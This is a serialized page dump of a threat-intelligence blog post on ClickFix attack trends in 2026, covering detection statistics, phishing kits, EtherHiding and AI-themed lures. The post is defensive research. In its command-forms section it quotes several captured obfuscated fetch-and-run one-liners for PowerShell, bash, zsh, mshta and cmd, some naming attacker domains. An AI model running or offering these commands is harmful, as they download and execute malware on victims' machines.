30.5 35.6-46.5 116.4 128 0-46.5-116.4z",{"w":381,"h":381,"d":408},"M497.4 49l17-17-33.9-33.9C473.6 4.9 453.3 25.2 419.7 58.8 375.4 22.1 318.5 0 256.4 0 115.1 0 .4 114.6 .4 256s114.6 256 256 256 256-114.6 256-256l-48 0c0 114.9-93.1 208-208 208s-208-93.1-208-208 93.1-208 208-208c48.8 0 93.7 16.8 129.1 44.9l-45.7 45.7c-23.5-16.8-52.3-26.6-83.4-26.6-79.5 0-144 64.5-144 144s64.5 144 144 144 144-64.5 144-144l-48 0c0 53-43 96-96 96s-96-43-96-96 43-96 96-96c17.8 0 34.5 4.8 48.8 13.3-52 52-79.5 79.5-82.7 82.7l33.9 33.9 17-17 224-224z",{"w":381,"h":381,"d":410},"M208 0l24 0C386.6 0 512 125.4 512 280l0 24-48 0 0-24C464 151.9 360.1 48 232 48l-24 0 0-48zm24 96c101.6 0 184 82.4 184 184l0 24-48 0 0-24c0-75.1-60.9-136-136-136l-24 0 0-48 24 0zM48 256c0 114.9 93.1 208 208 208 22.9 0 45-3.7 65.6-10.5l-263-263C51.7 211 48 233.1 48 256zM0 256c0-36.5 7.6-71.3 21.4-102.7 6.7-15.3 14.9-29.9 24.4-43.5 7.7 7.7 61.5 61.5 161.2 161.2 30.5-30.5 49.5-49.5 57-57L297.9 248c-7.5 7.5-26.5 26.5-57 57 99.7 99.7 153.5 153.5 161.2 161.2-13.6 9.5-28.2 17.7-43.5 24.4-31.4 13.8-66.2 21.4-102.7 21.4-141.4 0-256-114.6-256-256z",{"w":381,"h":381,"d":412},"M267.6 4.5l207.5 80.5 19.2 7.4 1.2 20.5c2.9 50-4.9 126.3-37.3 200.9-32.7 75.2-91.1 150-189.4 192.5l-12.7 5.5-12.7-5.5C144.9 463.9 86.6 389.2 53.9 313.9 21.5 239.3 13.7 162.9 16.6 113L17.8 92.5 37 85 244.5 4.5 256 0 267.6 4.5zM64.1 126C63.1 169.5 71 232.9 97.9 294.8 126.1 359.7 175 422.4 256 459.6 337.1 422.4 385.9 359.7 414.2 294.8 441 232.9 449 169.5 448 126L256 51.5 64.1 126zm302.3 44.7L352.3 190.1 249.8 330.9 233 354c-8.8-9.1-30.9-32-66.2-68.6l-16.7-17.3 34.5-33.3c9.5 9.8 23.9 24.7 43.2 44.7l85.6-117.7 14.1-19.4 38.8 28.2z",{"w":381,"h":381,"d":414},"M192 48l40 0 0 108-12.4 0c-7.6-16.5-24.3-28-43.6-28-26.5 0-48 21.5-48 48s21.5 48 48 48c19.4 0 36.1-11.5 43.6-28l12.4 0 0 56-92 0 0 56.4c-16.5 7.6-28 24.3-28 43.6 0 26.5 21.5 48 48 48s48-21.5 48-48c0-19.4-11.5-36.1-28-43.6l0-16.4 52 0 0 172-40 0c-16.8 0-31.2-10.3-37.1-25.1l-6.4-16-17.2 1c-1.1 .1-2.2 .1-3.2 .1-30.9 0-56-25.1-56-56 0-9.5 2.4-18.5 6.5-26.3l8.7-16.2-13.4-12.6c-11-10.2-17.8-24.8-17.8-40.9 0-21.6 12.2-40.4 30.3-49.8l22.6-11.7-13.1-21.9c-5-8.4-7.9-18.1-7.9-28.6 0-30.9 25.1-56 56-56l24 0 0-32c0-13.3 10.7-24 24-24zm88 148l12.4 0c7.6 16.5 24.3 28 43.6 28 26.5 0 48-21.5 48-48s-21.5-48-48-48c-19.4 0-36.1 11.5-43.6 28l-12.4 0 0-108 40 0c13.3 0 24 10.7 24 24l0 32 24 0c30.9 0 56 25.1 56 56 0 10.5-2.9 20.3-7.9 28.6l-13.1 21.9 22.6 11.7c18 9.3 30.3 28.1 30.3 49.8 0 16.1-6.8 30.7-17.8 40.9l-13.4 12.6 8.7 16.2c4.2 7.8 6.5 16.7 6.5 26.3 0 30.9-25.1 56-56 56-1.1 0-2.2 0-3.2-.1l-17.2-1-6.4 16C351.2 453.7 336.8 464 320 464l-40 0 0-76 92 0 0-56.4c16.5-7.6 28-24.3 28-43.6 0-26.5-21.5-48-48-48s-48 21.5-48 48c0 19.4 11.5 36.1 28 43.6l0 16.4-52 0 0-152zM192 512l128 0c31.1 0 58.4-16.2 74.1-40.5 52.7-5.1 93.9-49.5 93.9-103.5 0-11.5-1.9-22.5-5.3-32.9 13.4-17.5 21.3-39.4 21.3-63.1 0-32-14.5-60.6-37.1-79.7 3.3-10.2 5.1-21.1 5.1-32.3 0-49.6-34.8-91.1-81.3-101.5-6.3-33.3-35.6-58.5-70.7-58.5L192 0c-35.1 0-64.4 25.2-70.7 58.5-46.5 10.4-81.3 51.9-81.3 101.5 0 11.3 1.8 22.2 5.1 32.3-22.7 19.1-37.1 47.7-37.1 79.7 0 23.7 8 45.6 21.3 63.1-3.5 10.4-5.3 21.4-5.3 32.9 0 54 41.2 98.5 93.9 103.5 15.6 24.3 42.9 40.5 74.1 40.5zM336 192a16 16 0 1 1 0-32 16 16 0 1 1 0 32zm32 96a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zM176 352a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zm16-176a16 16 0 1 1 -32 0 16 16 0 1 1 32 0z",{"w":399,"h":381,"d":416},"M16 64C16 28.7 44.7 0 80 0L304 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L80 512c-35.3 0-64-28.7-64-64L16 64zm64 0l0 304 224 0 0-304-224 0zM192 472c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z",{"w":381,"h":381,"d":418},"M0 256c0-46.6 12.5-90.4 34.3-128.9L144.1 318.3c21.9 39.2 63.8 65.7 111.9 65.7 14.3 0 27.1-2.3 40.8-6.6L220.5 509.6C95.9 492.3 0 385.3 0 256zm365.1 65.6c12.3-19.2 18.9-42.5 18.9-65.6 0-38.2-16.8-72.5-43.3-96l152.7 0c12 29.6 18.6 62.1 18.6 96 0 141.4-114.6 255.1-256 256L365.1 321.6zM477.8 128L256 128c-62.9 0-113.7 44.1-125.5 102.7L54.2 98.5C101 38.5 174 0 256 0 350.8 0 433.5 51.5 477.8 128zM344 256a88 88 0 1 1 -176 0 88 88 0 1 1 176 0z",{"w":381,"h":381,"d":420},"M448 96l0 256-384 0 0-256 384 0zM64 32C28.7 32 0 60.7 0 96L0 352c0 35.3 28.7 64 64 64l144 0-16 48-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l272 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-72 0-16-48 144 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 32z",{"w":381,"h":381,"d":422},"M32 64C19.1 64 7.4 71.8 2.4 83.8S.2 109.5 9.4 118.6L192 301.3 192 416c0 8.5 3.4 16.6 9.4 22.6l64 64c9.2 9.2 22.9 11.9 34.9 6.9S320 492.9 320 480l0-178.7 182.6-182.6c9.2-9.2 11.9-22.9 6.9-34.9S492.9 64 480 64L32 64z",{"w":396,"h":381,"d":424},"M144 480c-79.5 0-144-64.5-144-144 0-63.4 41-117.2 97.9-136.5-1.3-7.7-1.9-15.5-1.9-23.5 0-79.5 64.5-144 144-144 55.4 0 103.5 31.3 127.6 77.1 14.2-8.3 30.8-13.1 48.4-13.1 53 0 96 43 96 96 0 15.7-3.8 30.6-10.5 43.7 44 20.3 74.5 64.7 74.5 116.3 0 70.7-57.3 128-128 128l-304 0zM305 191c-9.4-9.4-24.6-9.4-33.9 0l-72 72c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l31-31 0 102.1c0 13.3 10.7 24 24 24s24-10.7 24-24l0-102.1 31 31c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-72-72z",{"id":426,"title":427,"authorsCollection":428,"content":438,"extension":1914,"faqItemsCollection":1915,"faqTitle":60,"featured":6,"hashTags":60,"meta":1917,"metaTitle":1918,"ogImage":60,"postType":1919,"publishedDate":1920,"relatedBlogPostsCollection":1921,"slug":4933,"stem":4934,"subtitle":60,"summary":4935,"synopsis":4946,"sys":4947,"tagsCollection":4950,"topicsCollection":4954,"__hash__":5009},"blog\u002Fblog\u002Fthe-state-of-clickfix-by-detection-data.json","The state of ClickFix: what Push detection data tells us in H2 2026",{"items":429},[430],{"fullName":431,"firstName":432,"jobTitle":433,"socialLinks":434,"profilePicture":436},"Dan Green","Dan","Threat Research",[435],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fdaniel-g-\u002F",{"url":437},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7jik1VhFgA3kgzXBXTm2Vw\u002Ffcd8c171da644903d0827eafcfbcaad0\u002FDan_Headshot_2025.png",{"json":439,"links":1716},{"nodeType":440,"data":441,"content":442},"document",{},[443,454,462,469,477,498,507,514,518,527,543,550,558,565,638,646,653,676,683,690,696,703,721,727,802,808,839,842,850,858,865,885,892,898,906,913,919,927,934,941,947,954,960,966,973,979,985,993,1000,1023,1030,1037,1043,1046,1054,1061,1203,1209,1212,1220,1228,1235,1247,1253,1256,1264,1287,1298,1304,1312,1319,1326,1332,1340,1347,1354,1360,1363,1371,1378,1401,1408,1411,1419,1426,1710],{"nodeType":444,"data":445,"content":446},"heading-1",{},[447],{"nodeType":448,"value":449,"marks":450,"data":453},"text","The big picture: the numbers behind ClickFix detections",[451],{"type":452},"bold",{},{"nodeType":455,"data":456,"content":457},"paragraph",{},[458],{"nodeType":448,"value":459,"marks":460,"data":461},"Since rising to prominence in 2024, ClickFix has continued to gather momentum as one of the go-to initial access techniques used by attackers in the wild. Last year, Microsoft reported that ClickFix was the top initial access vector recorded in its detection data, at 47% of detections. The technique is now firmly embedded in both criminal and nation-state affiliated operations around the world. ",[],{},{"nodeType":455,"data":463,"content":464},{},[465],{"nodeType":448,"value":466,"marks":467,"data":468},"But with continued evolution in the form of new sub-techniques, new execution surfaces and payloads, and more advanced infrastructure and tooling (something we’ve seen across the board with increased levels of AI-assisted tool development adding speed and scale), this problem is only getting worse for security teams. ",[],{},{"nodeType":455,"data":470,"content":471},{},[472],{"nodeType":448,"value":473,"marks":474,"data":476},"Through Q2, ClickFix made up an average of 52% of Push’s detections, surpassing other browser-based attacks (predominantly AiTM and device code) for the first time. And in August, this figure reached 67%. ",[475],{"type":452},{},{"nodeType":455,"data":478,"content":479},{},[480,484,489,493],{"nodeType":448,"value":481,"marks":482,"data":483},"Of those detections, ",[],{},{"nodeType":448,"value":485,"marks":486,"data":488},"three specific phishing kits made up 73%",[487],{"type":452},{},{"nodeType":448,"value":490,"marks":491,"data":492},": ERRTRAFFIC, TURNTIP, and NOCHAIN. (TURNTIP and NOCHAIN are Push’s internal names for kits that have not been publicly linked to a named kit or service). ",[],{},{"nodeType":448,"value":494,"marks":495,"data":497},"ERRTRAFFIC was the largest in August, making up 34% of ClickFix detections. ",[496],{"type":452},{},{"nodeType":499,"data":500,"content":506},"embedded-entry-block",{"target":501},{"sys":502},{"id":503,"type":504,"linkType":505},"5jbMODjCUMHnIfLQYsd3Ow","Link","Entry",[],{"nodeType":455,"data":508,"content":509},{},[510],{"nodeType":448,"value":511,"marks":512,"data":513},"More information on the specifics of these kits a little later. ",[],{},{"nodeType":515,"data":516,"content":517},"hr",{},[],{"nodeType":519,"data":520,"content":521},"heading-2",{},[522],{"nodeType":448,"value":523,"marks":524,"data":526},"Delivery continues to favor non-email channels",[525],{"type":452},{},{"nodeType":455,"data":528,"content":529},{},[530,534,539],{"nodeType":448,"value":531,"marks":532,"data":533},"Notably, ClickFix remains a trap that users fall into rather than something they’re targeted with directly. ",[],{},{"nodeType":448,"value":535,"marks":536,"data":538},"4 in 5 ClickFix payloads intercepted by Push in 2026 are accessed from search engines like Google and Bing",[537],{"type":452},{},{"nodeType":448,"value":540,"marks":541,"data":542},": the result of compromised sites, malvertising, and SEO poisoning. This sits significantly above the average, with around half of the attacks detected by Push coming via non-email channels.",[],{},{"nodeType":455,"data":544,"content":545},{},[546],{"nodeType":448,"value":547,"marks":548,"data":549},"The other delivery channels recorded include email, messenger apps, social media, inside business apps like SharePoint, and many more. ",[],{},{"nodeType":455,"data":551,"content":552},{},[553],{"nodeType":448,"value":554,"marks":555,"data":557},"This naturally means they completely bypass email-based security controls.",[556],{"type":452},{},{"nodeType":455,"data":559,"content":560},{},[561],{"nodeType":448,"value":562,"marks":563,"data":564},"This is supported by external reporting. Multiple separate campaigns have been reported involving large-scale compromise of legitimate sites, such as:",[],{},{"nodeType":566,"data":567,"content":568},"unordered-list",{},[569,594,616],{"nodeType":570,"data":571,"content":572},"list-item",{},[573],{"nodeType":455,"data":574,"content":575},{},[576,579,590],{"nodeType":448,"value":21,"marks":577,"data":578},[],{},{"nodeType":580,"data":581,"content":583},"hyperlink",{"uri":582},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-5-400-hacked-sites-serve-clickfix-payloads-stored-on-the-blockchain\u002F",[584],{"nodeType":448,"value":585,"marks":586,"data":589},"5,400+ compromised small-business sites",[587],{"type":588},"underline",{},{"nodeType":448,"value":591,"marks":592,"data":593}," across 2,200+ organizations were documented serving ClickFix payloads stored on the blockchain (a technique known as Etherhiding, which we’ll discuss later). ",[],{},{"nodeType":570,"data":595,"content":596},{},[597],{"nodeType":455,"data":598,"content":599},{},[600,603,612],{"nodeType":448,"value":21,"marks":601,"data":602},[],{},{"nodeType":580,"data":604,"content":606},{"uri":605},"https:\u002F\u002Fwww.derp.ca\u002Fresearch\u002Fta2726-wordpress-malware-launchpads\u002F",[607],{"nodeType":448,"value":608,"marks":609,"data":611},"1,509 WordPress sites",[610],{"type":588},{},{"nodeType":448,"value":613,"marks":614,"data":615}," were documented feeding SocGholish\u002FClickFix chains in July 2026.",[],{},{"nodeType":570,"data":617,"content":618},{},[619],{"nodeType":455,"data":620,"content":621},{},[622,625,634],{"nodeType":448,"value":21,"marks":623,"data":624},[],{},{"nodeType":580,"data":626,"content":628},{"uri":627},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002Fghost-cms-cve-2026-26980-exploited-to.html",[629],{"nodeType":448,"value":630,"marks":631,"data":633},"700+ Ghost CMS sites",[632],{"type":588},{},{"nodeType":448,"value":635,"marks":636,"data":637}," were compromised via CVE-2026-26980 in May 2026 and infected with ClickFix payloads.",[],{},{"nodeType":519,"data":639,"content":640},{},[641],{"nodeType":448,"value":642,"marks":643,"data":645},"LOLBINs and execution surfaces are broadening",[644],{"type":452},{},{"nodeType":455,"data":647,"content":648},{},[649],{"nodeType":448,"value":650,"marks":651,"data":652},"We see a huge variance in commands and execution surfaces targeted. ",[],{},{"nodeType":566,"data":654,"content":655},{},[656,666],{"nodeType":570,"data":657,"content":658},{},[659],{"nodeType":455,"data":660,"content":661},{},[662],{"nodeType":448,"value":663,"marks":664,"data":665},"84 distinct command forms observed, and 34 seen only once. ",[],{},{"nodeType":570,"data":667,"content":668},{},[669],{"nodeType":455,"data":670,"content":671},{},[672],{"nodeType":448,"value":673,"marks":674,"data":675},"20+ binaries including PowerShell, echo, base64, bash, curl, mshta, cmd, zsh, conhost, rundll32, msiexec, pcalua, net, wmic, sh, eval, cscript, wscript, certutil, and schtasks.",[],{},{"nodeType":455,"data":677,"content":678},{},[679],{"nodeType":448,"value":680,"marks":681,"data":682},"echo, base64, and openssl appear frequently as plumbing (decoding or printing data within a command chain rather than executing it), while msiexec, rundll32, pcalua, finger, and others each appear in a handful of payloads, reflecting the LOLBin rotation pattern where operators cycle through trusted binaries to stay ahead of endpoint detection rules. ",[],{},{"nodeType":455,"data":684,"content":685},{},[686],{"nodeType":448,"value":687,"marks":688,"data":689},"Since the main kits all read their configuration from a contract rather than the page, payload and lure are fetched at load and can be swapped without the page changing. ",[],{},{"nodeType":499,"data":691,"content":695},{"target":692},{"sys":693},{"id":694,"type":504,"linkType":505},"1GylosLougBNAuvqMGGpSW",[],{"nodeType":455,"data":697,"content":698},{},[699],{"nodeType":448,"value":700,"marks":701,"data":702},"Some of the common command forms we’ve captured include:",[],{},{"nodeType":566,"data":704,"content":705},{},[706],{"nodeType":570,"data":707,"content":708},{},[709],{"nodeType":455,"data":710,"content":711},{},[712,717],{"nodeType":448,"value":713,"marks":714,"data":716},"macOS\u002FLinux. ",[715],{"type":452},{},{"nodeType":448,"value":718,"marks":719,"data":720},"The most primitive shape we see. A base64 blob is decoded inline and fed straight into bash through a herestring. The decoded text is itself a curl download piped to bash. bash \u003C\u003C\u003C $(echo \"Y3VybCAtcyAnaHR0cHM6Ly9zeXN0ZW1sb2dpY29wY29wdGltaXplci5jb21sd…\" | base64 -d)",[],{},{"nodeType":499,"data":722,"content":726},{"target":723},{"sys":724},{"id":725,"type":504,"linkType":505},"1yFYXNAZjBiQagdh9c0lCz",[],{"nodeType":566,"data":728,"content":729},{},[730,745,759,774,788],{"nodeType":570,"data":731,"content":732},{},[733],{"nodeType":455,"data":734,"content":735},{},[736,741],{"nodeType":448,"value":737,"marks":738,"data":740},"Windows.",[739],{"type":452},{},{"nodeType":448,"value":742,"marks":743,"data":744}," PowerShell fetches a script from a bare IP address (masked here) and runs it in memory, never touching disk. powershell -c iex(irm \u003Cip> -UseBasicParsing)",[],{},{"nodeType":570,"data":746,"content":747},{},[748],{"nodeType":455,"data":749,"content":750},{},[751,755],{"nodeType":448,"value":737,"marks":752,"data":754},[753],{"type":452},{},{"nodeType":448,"value":756,"marks":757,"data":758}," Fetch-and-run one-liner — PowerShell downloads from a hostname and executes in memory. powershell iex(irm wirelesswebdevice.com -UseBasicParsing)",[],{},{"nodeType":570,"data":760,"content":761},{},[762],{"nodeType":455,"data":763,"content":764},{},[765,770],{"nodeType":448,"value":766,"marks":767,"data":769},"macOS\u002FLinux.",[768],{"type":452},{},{"nodeType":448,"value":771,"marks":772,"data":773}," The URL is hidden in base64, decoded by openssl, fetched with curl and piped into zsh. curl -s $(echo \"aHR0cHM6Ly9xdWVzdC0yMi5jb20vY3VybC8wNHRncXNpM3…\" | openssl base64 -d -A) | zsh",[],{},{"nodeType":570,"data":775,"content":776},{},[777],{"nodeType":455,"data":778,"content":779},{},[780,784],{"nodeType":448,"value":766,"marks":781,"data":783},[782],{"type":452},{},{"nodeType":448,"value":785,"marks":786,"data":787}," A decoy line impersonating an OpenAI Codex install is echoed first, then the real command decodes a base64 URL and pipes curl into zsh. echo \"npm install -g @openai\u002Fcodex https:\u002F\u002Fopenai.com\u002Fcodex\u002F\" && curl -s $(echo \"aHR0cHM6Ly9xdWVzdC0yMi5jb20vY3VybC8wNHRqd…\" | openssl base64 -d -A) | zsh",[],{},{"nodeType":570,"data":789,"content":790},{},[791],{"nodeType":455,"data":792,"content":793},{},[794,798],{"nodeType":448,"value":737,"marks":795,"data":797},[796],{"type":452},{},{"nodeType":448,"value":799,"marks":800,"data":801}," A launcher chain: pcalua starts PowerShell, which starts cmd, which runs mshta. The mshta and the URL are caret-split so neither matches as a string. pcalua -a \"PowerShell\" -c \"saps cmd '\u002Fv\u002Fc m^s^h^t^a h^t^t^p^s^:^\u002F^\u002Ffine-work-team.com\u002F6272' -Wi Hi\"",[],{},{"nodeType":499,"data":803,"content":807},{"target":804},{"sys":805},{"id":806,"type":504,"linkType":505},"4LWBMsmwySzy1Ux6B13umE",[],{"nodeType":566,"data":809,"content":810},{},[811,825],{"nodeType":570,"data":812,"content":813},{},[814],{"nodeType":455,"data":815,"content":816},{},[817,821],{"nodeType":448,"value":737,"marks":818,"data":820},[819],{"type":452},{},{"nodeType":448,"value":822,"marks":823,"data":824}," A character array is XOR-decoded at runtime to rebuild the URL, then Invoke-WebRequest writes an executable into TEMP and runs it. The URL never appears as text. powershell -nop -w h -c \"$uXsp=([char[]]@(88,68,68,64,10,31,31,9,4,30,1,0,3,30,1,30,1,7,5,10,1,6,4,8,2,31,66,69,94,68,89,93,85,111,5,6,7,83,7,86,7,9,30,85,72,85)|%{[char]($_-bxor48)})-join'';iwr $uXsp -Out $env:TEMP\\u.exe;&$env:TEMP\\u.exe\"",[],{},{"nodeType":570,"data":826,"content":827},{},[828],{"nodeType":455,"data":829,"content":830},{},[831,835],{"nodeType":448,"value":737,"marks":832,"data":834},[833],{"type":452},{},{"nodeType":448,"value":836,"marks":837,"data":838}," A cmd one-liner that hides the binary name with caret escaping and uses a for-loop to execute whatever the command returns. %COMSPEC% \u002Fc s^t^a^r^t \"\" \u002Fmin for \u002Ff \"delims=@\" %o in (',f^^i^^n^^g^^e^^r ksqALiwYXQ@f^^i^^n^^g^^e^^r^^.^^linkedinsig.com') do %o & '…'",[],{},{"nodeType":515,"data":840,"content":841},{},[],{"nodeType":444,"data":843,"content":844},{},[845],{"nodeType":448,"value":846,"marks":847,"data":849},"Trending techniques",[848],{"type":452},{},{"nodeType":519,"data":851,"content":852},{},[853],{"nodeType":448,"value":854,"marks":855,"data":857},"EtherHiding",[856],{"type":452},{},{"nodeType":455,"data":859,"content":860},{},[861],{"nodeType":448,"value":862,"marks":863,"data":864},"EtherHiding is where instead of fetching its configuration from a web server, the kit reads it from a smart contract on a public blockchain. There is no host to take down and no domain to block, and the operator changes what is served by writing a transaction.",[],{},{"nodeType":455,"data":866,"content":867},{},[868,872,881],{"nodeType":448,"value":869,"marks":870,"data":871},"EtherHiding has been observed across multiple kits and is operating at substantial scale in the wild. ",[],{},{"nodeType":580,"data":873,"content":875},{"uri":874},"https:\u002F\u002Fwww.netskope.com\u002Fblog\u002Fmalware-on-the-blockchain-an-ongoing-campaigns-new-webrtc-twist",[876],{"nodeType":448,"value":877,"marks":878,"data":880},"Netskope documented an ongoing campaign",[879],{"type":588},{},{"nodeType":448,"value":882,"marks":883,"data":884}," across 5,400+ compromised websites retrieving payloads from a single BNB Smart Chain testnet smart contract — at zero cost to the operator. Updating that one contract changes what every site delivers, and the blockchain is immune to takedown requests. ]",[],{},{"nodeType":455,"data":886,"content":887},{},[888],{"nodeType":448,"value":889,"marks":890,"data":891},"The networks observed by Push include BNB Smart Chain testnet, Polygon, Base and Ethereum Sepolia, reached through ordinary public RPC providers, with most of the traffic on testnets. ",[],{},{"nodeType":499,"data":893,"content":897},{"target":894},{"sys":895},{"id":896,"type":504,"linkType":505},"mNMfocLNw54H4UTCACe7D",[],{"nodeType":519,"data":899,"content":900},{},[901],{"nodeType":448,"value":902,"marks":903,"data":905},"Adoption of Win+X",[904],{"type":452},{},{"nodeType":455,"data":907,"content":908},{},[909],{"nodeType":448,"value":910,"marks":911,"data":912},"Kits instruct the victim through Win+R, through Win+X, or through Terminal on macOS. We’re seeing kits use a combination of both in our detections. The Run dialog (Win+R) opens a user-level shell. Win+X then I opens PowerShell or Terminal as administrator.",[],{},{"nodeType":499,"data":914,"content":918},{"target":915},{"sys":916},{"id":917,"type":504,"linkType":505},"7tnN7yTCXvYR9dQCmF1KvX",[],{"nodeType":519,"data":920,"content":921},{},[922],{"nodeType":448,"value":923,"marks":924,"data":926},"AI-themed lures",[925],{"type":452},{},{"nodeType":455,"data":928,"content":929},{},[930],{"nodeType":448,"value":931,"marks":932,"data":933},"We’ve seen a rise in attacks targeting developer and AI tooling as part of the deception, capitalizing on AI adoption trends. ",[],{},{"nodeType":455,"data":935,"content":936},{},[937],{"nodeType":448,"value":938,"marks":939,"data":940},"First, we saw attackers weaponizing malvertised install guides for popular tools like Claude Code and NotebookLM (which doesn’t even have a legit installer).",[],{},{"nodeType":499,"data":942,"content":946},{"target":943},{"sys":944},{"id":945,"type":504,"linkType":505},"17od6VoYRdCC2nEHONs7lF",[],{"nodeType":455,"data":948,"content":949},{},[950],{"nodeType":448,"value":951,"marks":952,"data":953},"Then, attackers took it a step further by generating artifacts using popular LLMs like ChatGPT and Claude, placing more malicious ads with the link to their shared chat.",[],{},{"nodeType":499,"data":955,"content":959},{"target":956},{"sys":957},{"id":958,"type":504,"linkType":505},"38yWqRR5JFSxVxf3pRIyUB",[],{"nodeType":499,"data":961,"content":965},{"target":962},{"sys":963},{"id":964,"type":504,"linkType":505},"1uYzrxsVScSyl4JMRgcb9J",[],{"nodeType":455,"data":967,"content":968},{},[969],{"nodeType":448,"value":970,"marks":971,"data":972},"One recent example combines this with a creative Windows update lure — a deception that emerged late in 2025. The victim lands on a copy of the ChatGPT interface in Dutch and clicks Log in. The page goes full-screen and starts a fake Windows Update, ending with a ClickFix lure.",[],{},{"nodeType":499,"data":974,"content":978},{"target":975},{"sys":976},{"id":977,"type":504,"linkType":505},"GPBTLT7AtHWtqp4KQJldB",[],{"nodeType":499,"data":980,"content":984},{"target":981},{"sys":982},{"id":983,"type":504,"linkType":505},"TUjEtcYzSBSQvocAZz8Sp",[],{"nodeType":519,"data":986,"content":987},{},[988],{"nodeType":448,"value":989,"marks":990,"data":992},"Obfuscation and detection evasion",[991],{"type":452},{},{"nodeType":455,"data":994,"content":995},{},[996],{"nodeType":448,"value":997,"marks":998,"data":999},"Windows lures often avoid rendering the keystrokes they describe as plain text to defeat text matching, through:",[],{},{"nodeType":566,"data":1001,"content":1002},{},[1003,1013],{"nodeType":570,"data":1004,"content":1005},{},[1006],{"nodeType":455,"data":1007,"content":1008},{},[1009],{"nodeType":448,"value":1010,"marks":1011,"data":1012},"Homoglyph substitution — e.g. Р​r​е​ѕ​ѕ​ W​і​n​d​о​w​ѕ​ В​u​t​t​о​n + R, built from Cyrillic lookalikes and zero-width joiners so the words never appear as ASCII.",[],{},{"nodeType":570,"data":1014,"content":1015},{},[1016],{"nodeType":455,"data":1017,"content":1018},{},[1019],{"nodeType":448,"value":1020,"marks":1021,"data":1022},"Mid-word fragmentation — To prove t \u002F hat \u002F ou a \u002F re not \u002F ro bot, split across elements.",[],{},{"nodeType":455,"data":1024,"content":1025},{},[1026],{"nodeType":448,"value":1027,"marks":1028,"data":1029},"The anti-analysis doesn’t end there. Referrer checks, webdriver and headless-browser detection, canvas and WebGL fingerprinting, one-time links, geo and IP gating, and debugger traps are all common, with unrelated kits drawing down on the same toolkit of evasion techniques. ",[],{},{"nodeType":455,"data":1031,"content":1032},{},[1033],{"nodeType":448,"value":1034,"marks":1035,"data":1036},"ClickFix by design is intended to get around the controls usually designed to stop malware delivery. By using fetch-and-run methods, alongside various forms of obfuscation and encoding, the attacks download a script from a remote host and run it entirely in memory, while masking the urls the script is fetching from. Nothing is written to disk, reducing the detection opportunities, with the actual malicious payload arriving in the second stage. ",[],{},{"nodeType":499,"data":1038,"content":1042},{"target":1039},{"sys":1040},{"id":1041,"type":504,"linkType":505},"3F7xE1eU6zCWeWGqTy8FtM",[],{"nodeType":515,"data":1044,"content":1045},{},[],{"nodeType":519,"data":1047,"content":1048},{},[1049],{"nodeType":448,"value":1050,"marks":1051,"data":1053},"Payload evolution",[1052],{"type":452},{},{"nodeType":455,"data":1055,"content":1056},{},[1057],{"nodeType":448,"value":1058,"marks":1059,"data":1060},"At Push, we’re focused on the upstream ClickFix delivery rather than malware analysis and execution. But endpoint-layer controls are coming under increasing pressure in the face of ClickFix evolution as attackers look to develop new ways of evading controls.",[],{},{"nodeType":566,"data":1062,"content":1063},{},[1064,1087,1111,1138,1177],{"nodeType":570,"data":1065,"content":1066},{},[1067],{"nodeType":455,"data":1068,"content":1069},{},[1070,1074,1083],{"nodeType":448,"value":1071,"marks":1072,"data":1073},"ClickFix Payload-as-a-Service (CPaaS) platforms offer ",[],{},{"nodeType":580,"data":1075,"content":1077},{"uri":1076},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fresearcher-analyzes-3000-live-clickfix.html",[1078],{"nodeType":448,"value":1079,"marks":1080,"data":1082},"API-driven backends",[1081],{"type":588},{},{"nodeType":448,"value":1084,"marks":1085,"data":1086}," generating uniquely obfuscated payloads per victim, mapped across ~3,000 live payloads. ",[],{},{"nodeType":570,"data":1088,"content":1089},{},[1090],{"nodeType":455,"data":1091,"content":1092},{},[1093,1097,1107],{"nodeType":448,"value":1094,"marks":1095,"data":1096},"Russian-origin Loader-as-a-Service ",[],{},{"nodeType":580,"data":1098,"content":1100},{"uri":1099},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-doublecup-clickfix-service-hides-malware-in-browser-cache-images\u002F",[1101],{"nodeType":448,"value":1102,"marks":1103,"data":1106},"DOUBLECUP",[1104,1105],{"type":588},{"type":452},{},{"nodeType":448,"value":1108,"marks":1109,"data":1110}," uses a customer-facing ClickFix builder and steganographic browser cache persistence (payloads encoded in PNG images cached during normal browsing) to evade detection.",[],{},{"nodeType":570,"data":1112,"content":1113},{},[1114],{"nodeType":455,"data":1115,"content":1116},{},[1117,1121,1134],{"nodeType":448,"value":1118,"marks":1119,"data":1120},"Elastic's research on MimicRAT documents multi-stage PowerShell chains that perform AMSI and ETW bypasses as their first action before dropping further payloads. The",[],{},{"nodeType":580,"data":1122,"content":1124},{"uri":1123},"https:\u002F\u002Fgbhackers.com\u002Frundll32-and-webdav\u002F",[1125,1129],{"nodeType":448,"value":1126,"marks":1127,"data":1128}," ",[],{},{"nodeType":448,"value":1130,"marks":1131,"data":1133},"rundll32+WebDAV variant",[1132],{"type":588},{},{"nodeType":448,"value":1135,"marks":1136,"data":1137}," shows operators moving away from PowerShell entirely to avoid AMSI's coverage.",[],{},{"nodeType":570,"data":1139,"content":1140},{},[1141],{"nodeType":455,"data":1142,"content":1143},{},[1144,1148,1157,1161,1173],{"nodeType":448,"value":1145,"marks":1146,"data":1147},"Ransomware operator ",[],{},{"nodeType":580,"data":1149,"content":1151},{"uri":1150},"https:\u002F\u002Fransom-isac.org\u002Fblog\u002Fcrpx0-clickfix-ransomware-analysis\u002F",[1152],{"nodeType":448,"value":1153,"marks":1154,"data":1156},"CRPx0",[1155],{"type":588},{},{"nodeType":448,"value":1158,"marks":1159,"data":1160}," uses ClickFix pages as its primary delivery mechanism targeting 30+ victims since July 2026 